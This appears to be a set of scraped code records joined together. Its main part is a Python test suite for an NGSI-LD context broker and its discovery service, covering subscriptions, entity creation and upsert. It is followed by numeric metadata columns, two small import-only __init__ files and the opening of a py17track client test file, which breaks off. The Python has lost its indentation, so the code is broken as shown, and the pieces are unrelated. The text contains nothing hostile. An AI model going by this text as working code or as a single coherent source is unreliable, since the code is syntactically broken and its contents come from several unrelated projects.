headers={'Content-Type' : 'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata29),headers=headers)
#print(r.content)
#print(r.status_code)
#making a get request
url=brokerIp+"/ngsi-ld/v1/subscriptions/urn:ngsi-ld:Subscription:8"
headers={'Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
r=requests.get(url,headers=headers)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp["id"]=="urn:ngsi-ld:Subscription:8":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 42
'''
To test for update subscription over discovery
'''
def test_case42():
#create a subscription
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
headers={'Content-Type' : 'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata30),headers=headers)
#print(r.content)
#print(r.status_code)
#get subscription over discovery before update
url=discoveryIp+"/ngsi9/subscription"
r=requests.get(url)
#print(r.content)
#print(r.status_code)
#update the subscription
url=brokerIp+"/ngsi-ld/v1/subscriptions/urn:ngsi-ld:Subscription:10"
headers={'Content-Type':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.patch(url,data=json.dumps(ld_data.subdata31),headers=headers)
#print(r.content)
#print(r.status_code)
#get subscription after update
url=discoveryIp+"/ngsi9/subscription"
r=requests.get(url)
#print(r.content)
#print(r.status_code)
assert r.status_code == 200
#testCase 43
'''
To test entity creation with nested property with context in payload
'''
def test_case43():
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.post(url,data=json.dumps(ld_data.subdata33),headers=headers)
#print(r.content)
#print(r.status_code)
assert r.status_code == 201
#testCase 44
'''
To test create entity with nested property with context in Link
'''
def test_case44():
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata34),headers=headers)
print(r.content)
print(r.status_code)
assert r.status_code == 201
#testCase 45
'''
To test to retrieve entity with id as urn:ngsi-ld:B990
'''
def test_case45():
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:B990"
headers={'Content-Type' : 'application/ld+json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp["id"]=="urn:ngsi-ld:Vehicle:B990":
print("\nValidated")
else:
print("\nNot Validated")
print(r.status_code)
assert r.status_code == 200
#testCase 46
'''
To test and retrieve the entity from discovery
'''
def test_case46():
url=discoveryIp+"/ngsi9/registration/urn:ngsi-ld:Vehicle:C001"
r=requests.get(url)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp["ID"]=="urn:ngsi-ld:Vehicle:C001":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase 47
'''
To test if multiple subscription can be created with same subscription Id
'''
def test_case47():
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
headers={'Content-Type' : 'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata36),headers=headers)
#print(r.content)
#print(r.status_code)
#get subscription over discovery before update
url=discoveryIp+"/ngsi9/subscription"
r=requests.get(url)
#print(r.content)
#print(r.status_code)
#to create same subscription again
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
headers={'Content-Type' : 'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata36),headers=headers)
print(r.content)
#print(r.status_code)
assert r.status_code == 201
#testCase 48
'''
To test if delete attribute is reflected over discovery
'''
def test_case48():
#to create an entity
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata38),headers=headers)
#print(r.content)
#print(r.status_code)
#to fetch the registration from discovery
url=discoveryIp+"/ngsi9/registration/urn:ngsi-ld:Vehicle:A3000"
r=requests.get(url)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp["AttributesList"]["https://uri.etsi.org/ngsi-ld/default-context/brandName"])
print("\nchecking if brandName attribute is present in discovery before deletion")
if resp["ID"]=="urn:ngsi-ld:Vehicle:A3000":
if resp["AttributesList"]["https://uri.etsi.org/ngsi-ld/default-context/brandName"]["type"] == "Property":
print("\n-----> brandName is existing...!!")
else:
print("\n-----> brandName does not exist..!")
else:
print("\nNot Validated")
#print(r.status_code)
#to delete brandName attribute
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A3000/attrs/brandName"
r=requests.delete(url)
#print(r.content)
#print(r.status_code)
#To fetch registration again from discovery
url=discoveryIp+"/ngsi9/registration/urn:ngsi-ld:Vehicle:A3000"
r=requests.get(url)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp["AttributesList"])
print("\nchecking if brandName attribute is present in discovery after deletion")
if resp["ID"]=="urn:ngsi-ld:Vehicle:A3000":
if "https://uri.etsi.org/ngsi-ld/default-context/brandName" in resp["AttributesList"]:
print("\n-----> brandName is existing...!!")
else:
print("\n-----> brandName does not exist because deleted...!")
else:
print("\nNot Validated")
assert r.status_code == 200
#testCase 49
'''
To test if appended attribute is reflected on discovery
'''
def test_case49():
#to fetch registration of entity from discovery before appending
url=discoveryIp+"/ngsi9/registration/urn:ngsi-ld:Vehicle:A3000"
r=requests.get(url)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp["AttributesList"])
print("\nchecking if brandName1 attribute is present in discovery before appending")
if resp["ID"]=="urn:ngsi-ld:Vehicle:A3000":
if "https://uri.etsi.org/ngsi-ld/default-context/brandName1" in resp["AttributesList"]:
print("\n-----> brandName1 is existing...!!")
else:
print("\n-----> brandName1 does not exist yet...!")
else:
print("\nNot Validated")
#to append an entity with id as urn:ngsi-ld:Vehicle:A3000
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.post(url,data=json.dumps(ld_data.subdata4c),headers=headers)
#print(r.content)
#print(r.status_code)
assert r.status_code == 201
#to fetch registration of entity from discovery after appending
url=discoveryIp+"/ngsi9/registration/urn:ngsi-ld:Vehicle:A3000"
r=requests.get(url)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp["AttributesList"])
print("\nchecking if brandName1 attribute is present in discovery after appending")
if resp["ID"]=="urn:ngsi-ld:Vehicle:A3000":
if "https://uri.etsi.org/ngsi-ld/default-context/brandName1" in resp["AttributesList"]:
print("\n-----> brandName1 is existing after appending...!!")
else:
print("\n-----> brandName1 does not exist yet...!")
else:
print("\nNot Validated")
assert r.status_code == 200
#testCase 50
'''
To test if discovery's context availablity is updated on updating
'''
def test_case50():
#to create entity
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata40),headers=headers)
#print(r.content)
#print(r.status_code)
#to create subscription
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
headers={'Content-Type' : 'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata39),headers=headers)
#print(r.content)
#print(r.status_code)
#Update entity to fire notification
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.post(url,data=json.dumps(ld_data.subdata41),headers=headers)
#print(r.status_code)
#to validate
url="http://0.0.0.0:8888/validateNotification"
r=requests.post(url,json={"subscriptionId" : "urn:ngsi-ld:Subscription:020"})
print(r.content)
assert r.status_code == 200
# testCase 51
'''
To test if instanceId is fetched while creating entity
'''
def test_case51():
# to create entity
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata42),headers=headers)
#print(r.content)
#print(r.status_code)
# to fetch and verify instanceId
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:C001"
headers={'Content-Type' : 'application/ld+json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp["brandName1"]["instanceId"]=="instance1":
print("\nValidated")
else:
print("\nNot Validated")
print(r.status_code)
assert r.status_code == 200
# testCase 52
'''
To test if datasetId is fetched while creating entity
'''
def test_case52():
# to create entity
url=brokerIp+"/ngsi-ld/v1/entities/"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata43),headers=headers)
#print(r.content)
#print(r.status_code)
# to fetch and verify instanceId
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:C002"
headers={'Content-Type' : 'application/ld+json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp)
if resp["brandName1"]["datasetId"]=="dataset1":
print("\nValidated")
else:
print("\nNot Validated")
print(r.status_code)
assert r.status_code == 200
#testCase 53
'''
To test for subscription without entities in Payload
'''
def test_case53():
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
headers={'Content-Type' : 'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata44),headers=headers)
print(r.content)
#print(r.status_code)
assert r.status_code == 400
#testCase 54
'''
To test for subscription with different type in payload
'''
def test_case54():
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
headers={'Content-Type' : 'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata45),headers=headers)
print(r.content)
#print(r.status_code)
assert r.status_code == 400
#testCase 55
'''
To test Upsert API for single entity creation
'''
def test_case55():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/ld + json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata46),headers=headers)
print(r.content)
assert r.status_code == 500
#testCase 56
'''
To test Upsert API for multiple entity creation
'''
def test_case56():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata47),headers=headers)
print(r.content)
assert r.status_code == 204
#testCase 57
'''
To test Upsert API for entity creation with different headers
'''
def test_case57():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata48),headers=headers)
print(r.content)
assert r.status_code == 404
#testCase 58
'''
To test Upsert API for entity creation with different headers
'''
def test_case58():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/abc+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata47),headers=headers)
print(r.content)
assert r.status_code == 500
#testCase 59
'''
To test Upsert API for entities creation with one empty payload in entities array
'''
def test_case59():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata49),headers=headers)
print(r.content)
assert r.status_code == 207
#testCase 60
'''
To test Upsert API for multple entity creation with missing id in first entity
'''
def test_case60():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata50),headers=headers)
print(r.content)
assert r.status_code == 207
#testCase 61
'''
To test Upsert API for multple entity creation with missing id in second entity
'''
def test_case61():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata51),headers=headers)
print(r.content)
assert r.status_code == 207
#testCase 62
'''
To test Upsert API for multple entity creation with missing id in both entities
'''
def test_case62():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata52),headers=headers)
print(r.content)
assert r.status_code == 404
#testCase 63
'''
To test Upsert API for multiple entity creation with missing type in first entity
'''
def test_case63():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata53),headers=headers)
print(r.content)
assert r.status_code == 207
#testCase 64
'''
To test Upsert API for multiple entity creation with missing type in other entity
'''
def test_case64():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata54),headers=headers)
print(r.content)
assert r.status_code == 207
#testCase 65
'''
To test Upsert API for multiple entity creation with missing type in both entities
'''
def test_case65():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata55),headers=headers)
print(r.content)
assert r.status_code == 404
#testCase 66
'''
To test Upsert API for multiple entity creation with id not as a uri in first entity
'''
def test_case66():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata56),headers=headers)
print(r.content)
assert r.status_code == 207
#testCase 67
'''
To test Upsert API for multiple entity creation with id not as a uri in second entity
'''
def test_case67():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata57),headers=headers)
print(r.content)
assert r.status_code == 207
#testCase 68
'''
To test Upsert API for multiple entity creation with id not as a uri in both entities
'''
def test_case68():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata58),headers=headers)
print(r.content)
assert r.status_code == 404
#testCase 69
'''
To test Upsert API for multiple entity creation with array in attributes of first entity
'''
def test_case69():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata59),headers=headers)
print(r.content)
# to fetch the corresponding entity
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A0001"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
assert r.status_code == 200
#testCase 70
'''
To test Upsert API for multiple entity creation with array in attributes of both entities
'''
def test_case70():
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata60),headers=headers)
print(r.content)
# to fetch the corresponding first entity
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A0101"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
# to fetch the corresponding second entity
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A9090"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
assert r.status_code == 200
#testCase71
'''
To test Upsert API for multiple entity creation along with updation
'''
def test_case71():
#create entities
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata61),headers=headers)
print(r.content)
# to fetch the corresponding first entity
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A0210"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp["AttributesList"]["https://uri.etsi.org/ngsi-ld/default-context/brandName"])
print("\nchecking the value of brandName attribute on entity creation")
if resp["id"]=="urn:ngsi-ld:Vehicle:A0210":
print(resp["brandName"]["value"])
#create entities
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata62),headers=headers)
#print(r.content)
# to fetch the corresponding first entity
url=brokerIp+"/ngsi-ld/v1/entities/urn:ngsi-ld:Vehicle:A0210"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.get(url,headers=headers)
#print(r.content)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
#print(resp["AttributesList"]["https://uri.etsi.org/ngsi-ld/default-context/brandName"])
print("\nchecking the value of brandName attribute after entity update")
if resp["id"]=="urn:ngsi-ld:Vehicle:A0210":
print(resp["brandName"]["value"])
assert r.status_code == 200
#testCase72
'''
To test registration on discovery
'''
def test_case72():
url=discoveryIp+"/ngsi9/registration/urn:ngsi-ld:Vehicle:A0210"
r=requests.get(url)
resp_content=r.content
resInJson= resp_content.decode('utf8').replace("'", '"')
resp=json.loads(resInJson)
print(resp)
if resp["ID"]=="urn:ngsi-ld:Vehicle:A0210":
print("\nValidated")
else:
print("\nNot Validated")
#print(r.status_code)
assert r.status_code == 200
#testCase73
'''
to test subscription for entities created using upsert API
'''
def test_case73():
#to create subscription
url=brokerIp+"/ngsi-ld/v1/subscriptions/"
headers={'Content-Type' : 'application/ld+json','Link':'<{{link}}>; rel="https://uri.etsi.org/ngsi-ld/v1/ngsi-ld-core-context.jsonld"; type="application/ld+json"'}
r=requests.post(url,data=json.dumps(ld_data.subdata63),headers=headers)
#print(r.content)
#print(r.status_code)
#Update entity to fire notification
url=brokerIp+"/ngsi-ld/v1/entityOperations/upsert"
headers={'Content-Type' : 'application/json','Accept':'application/ld+json'}
r=requests.post(url,data=json.dumps(ld_data.subdata64),headers=headers)
#print(r.status_code)
#to validate
url="http://0.0.0.0:8888/validateNotification"
r=requests.post(url,json={"subscriptionId" : "urn:ngsi-ld:Subscription:Upsert"})
print(r.content)
assert r.status_code == 200
| 39.333856
| 199
| 0.654612
| 6,720
| 50,190
| 4.839286
| 0.06369
| 0.048524
| 0.051415
| 0.049139
| 0.894004
| 0.877337
| 0.863899
| 0.843266
| 0.830197
| 0.807103
| 0
| 0.024309
| 0.182008
| 50,190
| 1,275
| 200
| 39.364706
| 0.767799
| 0.094561
| 0
| 0.716981
| 0
| 0.079826
| 0.387208
| 0.125624
| 0
| 0
| 0
| 0
| 0.107402
| 0
| null | null | 0
| 0.013062
| null | null | 0.166909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5d46a649ec2e15b87ebfb500d32d4d67cbf172b6
| 177
|
py
|
Python
|
pyorama/data/__init__.py
|
AnishN/pyorama
|
e2248f6f915412436f29d0712d172d22a47aece1
|
[
"MIT"
] | 7
|
2019-09-23T04:47:01.000Z
|
2022-02-20T14:48:39.000Z
|
pyorama/data/__init__.py
|
AnishN/pyorama
|
e2248f6f915412436f29d0712d172d22a47aece1
|
[
"MIT"
] | null | null | null |
pyorama/data/__init__.py
|
AnishN/pyorama
|
e2248f6f915412436f29d0712d172d22a47aece1
|
[
"MIT"
] | 2
|
2018-01-04T15:49:08.000Z
|
2021-08-09T04:17:41.000Z
|
from pyorama.data.buffer import *
from pyorama.data.handle import *
from pyorama.data.hash_map import *
from pyorama.data.slot_map import *
from pyorama.data.vector import *
| 35.4
| 36
| 0.785311
| 27
| 177
| 5.074074
| 0.37037
| 0.40146
| 0.547445
| 0.613139
| 0.350365
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129944
| 177
| 5
| 37
| 35.4
| 0.88961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
5391fb10e9627a38fede27b98853739af0708548
| 118
|
py
|
Python
|
spanmb/data/__init__.py
|
zmmzGitHub/SpanMB_BERT
|
133c93e2876e27379f249df3922e531e2be66f04
|
[
"MIT"
] | null | null | null |
spanmb/data/__init__.py
|
zmmzGitHub/SpanMB_BERT
|
133c93e2876e27379f249df3922e531e2be66f04
|
[
"MIT"
] | null | null | null |
spanmb/data/__init__.py
|
zmmzGitHub/SpanMB_BERT
|
133c93e2876e27379f249df3922e531e2be66f04
|
[
"MIT"
] | null | null | null |
from spanmb.data.dataset_readers.spanmb import SpanMBReader
from spanmb.data.dataset_readers.document import Document
| 39.333333
| 59
| 0.881356
| 16
| 118
| 6.375
| 0.5
| 0.196078
| 0.27451
| 0.411765
| 0.54902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067797
| 118
| 2
| 60
| 59
| 0.927273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
53ab1251d653b16fdfe48e5d85a40ffbc3c385d9
| 11,166
|
py
|
Python
|
tests/test_profile.py
|
regevbr/py17track
|
0553e8b10dccdff05949760042cf8db936f2c094
|
[
"MIT"
] | 23
|
2018-07-28T17:44:03.000Z
|
2022-03-14T19:30:27.000Z
|
tests/test_profile.py
|
regevbr/py17track
|
0553e8b10dccdff05949760042cf8db936f2c094
|
[
"MIT"
] | 62
|
2018-10-31T03:58:05.000Z
|
2022-03-14T20:18:41.000Z
|
tests/test_profile.py
|
regevbr/py17track
|
0553e8b10dccdff05949760042cf8db936f2c094
|
[
"MIT"
] | 9
|
2020-10-16T10:49:42.000Z
|
2022-02-17T04:24:26.000Z
|
"""Define tests for the client object."""
from datetime import datetime
import aiohttp
import pytest
from pytz import UTC, timezone
from py17track import Client
from py17track.errors import InvalidTrackingNumberError, RequestError
from .common import TEST_EMAIL, TEST_PASSWORD, load_fixture
@pytest.mark.asyncio
async def test_login_failure(aresponses):
"""Test that a failed login returns the correct response."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_failure_response.json"), status=200
),
)
async with aiohttp.ClientSession() as session:
client = Client(session=session)
login_result = await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
assert login_result is False
@pytest.mark.asyncio
async def test_login_success(aresponses):
"""Test that a successful login returns the correct response."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
async with aiohttp.ClientSession() as session:
client = Client(session=session)
login_result = await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
assert login_result is True
@pytest.mark.asyncio
async def test_no_explicit_session(aresponses):
"""Test not providing an explicit aiohttp ClientSession."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
client = Client()
login_result = await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
assert login_result is True
@pytest.mark.asyncio
async def test_packages(aresponses):
"""Test getting packages."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("packages_response.json"), status=200),
)
async with aiohttp.ClientSession() as session:
client = Client(session=session)
await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
packages = await client.profile.packages()
assert len(packages) == 5
assert packages[0].location == "Paris"
assert packages[1].location == "Spain"
assert packages[2].location == "Milano Italy"
assert packages[3].location == ""
@pytest.mark.asyncio
async def test_packages_default_timezone(aresponses):
"""Test getting packages with default timezone."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("packages_response.json"), status=200),
)
async with aiohttp.ClientSession() as session:
client = Client(session=session)
await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
packages = await client.profile.packages()
assert len(packages) == 5
assert packages[0].timestamp.isoformat() == "2018-04-23T12:02:00+00:00"
assert packages[1].timestamp.isoformat() == "2019-02-26T01:05:34+00:00"
assert packages[2].timestamp.isoformat() == "1970-01-01T00:00:00+00:00"
@pytest.mark.asyncio
async def test_packages_user_defined_timezone(aresponses):
"""Test getting packages with user-defined timezone."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("packages_response.json"), status=200),
)
async with aiohttp.ClientSession() as session:
client = Client(session=session)
await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
packages = await client.profile.packages(tz="Asia/Jakarta")
assert len(packages) == 5
